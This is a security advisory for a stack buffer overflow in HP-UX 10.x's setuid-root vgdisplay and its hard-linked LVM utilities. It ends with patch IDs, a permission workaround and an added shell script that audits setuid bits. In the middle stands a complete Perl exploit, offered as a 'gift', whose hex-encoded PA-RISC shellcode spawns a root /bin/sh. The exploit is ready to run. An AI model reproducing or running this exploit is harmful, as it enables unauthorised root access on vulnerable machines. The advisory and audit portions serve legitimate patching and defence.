COMMAND
/usr/sbin/vgdisplay
SYSTEMS AFFECTED
HP-UX 10.x
PROBLEM
Due to insufficient bounds checking on arguments which are
supplied by users, it is possible to overwrite the internal stack
space of the vgdisplay program while it is executing. By
supplying a carefully designed argument to the vgdisplay program,
intruders may be able to force vgdisplay to execute arbitrary
commands. As vgdisplay is setuid root, this may allow intruders
to run arbitrary commands with root privileges.
Note that many of the LVM utility programs are hard links to
vgdisplay. This indicates that these utility programs share the
same code with vgdisplay, and may also be subject to similar
attacks.
The following programs are all hard links: lvchange, lvcreate,
lvdisplay, lvextend, lvlnboot, lvreduce, lvremove, lvrmboot,
pvchange, pvcreate, pvdisplay, pvmove, vgcfgbackup, vgcfgrestore,
vgchange, vgcreate, vgdisplay, vgexport, vgextend, vgimport,
vgreduce, vgremove, vgscan.
Scriptors of Doom and their guests have the following gift for those
working on HP-UX.
#!/usr/contrib/bin/perl
sub h2cs {
    local($stuff)=@_;
    local($rv);
    while($stuff !~ /^$/) {
        $bob=$stuff;
        $bob =~ s/^(..).*$/$1/;
        $stuff =~ s/^..//;
        #$rv.=chr(oct("0x${bob}"));
        $rv.=sprintf("%c",oct("0x${bob}"));
    }
    return $rv;
}
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;
if ($rev eq "10") {
    $offset=0;
    $prealign="a"x1071;
    $postalign="";            # 0 byte post
    $pcoq=&h2cs("7b03be03");
} else {
    $offset=2170;             # 2170 works for 9.X...
    $prealign="";             # zero byte pre
    $postalign="PP";          # 2 byte post
    $pcoq=&h2cs("7b033018");
}
$nop=&h2cs("08210280");
$code="";
#$code.=&h2cs("02233210");    # Opcode o' Death...
$code.=&h2cs("34160506");     # LDI 643,r22
$code.=&h2cs("96d60534");     # SUBI 666,r22,r22
$code.=&h2cs("20200801");     # LDIL L%0xc0000004,r1
$code.=&h2cs("e420e008");     # BLE 4(sr7,r1)
$code.=&h2cs("0b5a029a");     # XOR arg0,arg0,arg0
$code.=&h2cs("e83f1ffd");     # BL .+8,r1
$code.=&h2cs("08210280");     # NOP
$code.=&h2cs("34020102");     # LDI 129,rp
$code.=&h2cs("08410402");     # SUB r1,rp,rp
$code.=&h2cs("60400162");     # STB r0,177(rp)
$code.=&h2cs("b45a0154");     # ADDI 170,rp,arg0
$code.=&h2cs("0b390299");     # XOR arg1,arg1,arg1
$code.=&h2cs("0b180298");     # XOR arg2,arg2,arg2
$code.=&h2cs("341604be");     # LDI 607,r22
$code.=&h2cs("20200801");     # LDIL L%0xc0000004,r1
$code.=&h2cs("e420e008");     # BLE 4(sr7,r1)
$code.=&h2cs("96d60534");     # SUB 666,r22,r22
$code.=&h2cs("deadcafe");     # Illegal instruction -- dump core if exec fails
$data="/bin/sh.";             # Data stuff
for $k (keys %ENV) {
    delete $ENV{"$k"};
}
$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$num=64;
$pre="$nop"x$num;
$of=$prealign.$pcoq;
$of.=$pre.$code.$data;
exec("/usr/sbin/vgdisplay","$of");
SOLUTION
If you do not wish to install the patches, remove the setuid bit
and the non-root execute permissions. Sites will need to restrict
permissions on both the dynamically linked copies in /usr/sbin and
the statically linked copies in /sbin. For those who will apply a
patch, these are the patch IDs:
PHCO_10048 on all platforms with HP-UX releases 10.20,
PHCO_10059 on all platforms with HP-UX releases 10.10,
PHCO_10060 on all platforms with HP-UX releases 10.01,
PHCO_10061 on all platforms with HP-UX releases 10.00,
PHCO_10052 on all platforms with HP-UX releases 10.24.
NOTE: HP-UX release 9.X is not affected. All patches are
available now.
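An added audit script (not part of the advisory) that checks the workaround above: for a given directory it walks the LVM utility names listed in the PROBLEM section, reports which ones are hard links of vgdisplay (same inode) and which still carry the setuid bit, so both the /usr/sbin and /sbin copies can be verified after the permissions change. The function names and output format are this example's own.

```shell
#!/bin/sh
# Utility names from the advisory's hard-link list.
LVM_UTILS="lvchange lvcreate lvdisplay lvextend lvlnboot lvreduce lvremove
lvrmboot pvchange pvcreate pvdisplay pvmove vgcfgbackup vgcfgrestore vgchange
vgcreate vgdisplay vgexport vgextend vgimport vgreduce vgremove vgscan"

# audit_lvm_dir DIR
# Prints one line per utility present in DIR:  NAME link=yes|no setuid=yes|no
# link=yes means the file shares an inode with DIR/vgdisplay (so it runs the
# same vulnerable code).  Returns 0 when no setuid copies remain, 1 otherwise.
audit_lvm_dir() {
    dir=$1
    found=0
    for name in $LVM_UTILS; do
        f="$dir/$name"
        [ -e "$f" ] || continue
        if [ "$f" -ef "$dir/vgdisplay" ]; then link=yes; else link=no; fi
        if [ -u "$f" ]; then setuid=yes; found=1; else setuid=no; fi
        printf '%s link=%s setuid=%s\n' "$name" "$link" "$setuid"
    done
    return $found
}

# count_setuid_lvm DIR: number of LVM utilities in DIR still marked setuid.
count_setuid_lvm() {
    audit_lvm_dir "$1" | grep -c 'setuid=yes'
}

# On a live host, check both copies the advisory names (uncomment to run):
# for d in /usr/sbin /sbin; do echo "== $d"; audit_lvm_dir "$d"; done
```

Because the hard-linked utilities share one inode, clearing the setuid bit on vgdisplay clears it on all of them at once, which the audit shows by reporting setuid=no on every link=yes entry afterwards.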